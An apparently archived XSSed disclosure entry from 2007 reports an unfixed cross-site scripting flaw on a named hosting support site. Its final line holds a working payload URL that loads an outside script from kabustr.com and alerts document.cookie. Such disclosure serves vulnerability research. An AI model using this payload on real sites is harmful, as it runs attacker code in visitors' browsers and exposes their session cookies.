Unfixed XSS vulnerability at support.primehosting.co.uk

2007-04-16T00:00:00
ID XSSED:6255
Type xssed
Reporter KaBuS
Modified 2007-04-16T00:00:00

Description

Security researcher KaBuS, has submitted on 16/04/2007 a cross-site-scripting (XSS) vulnerability affecting support.primehosting.co.uk, which at the time of submission ranked 418862 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 16/04/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://support.primehosting.co.uk/index.php?<script%20language="Javascript"%20src="http://kabustr.com/chat/c.js"%20type="text/javascript">KaBuS-KabusTr.coM-KaBuS-KabusTr.coM</script><script>alert(document.cookie);</script><script>alert(/KaBuS/);</script>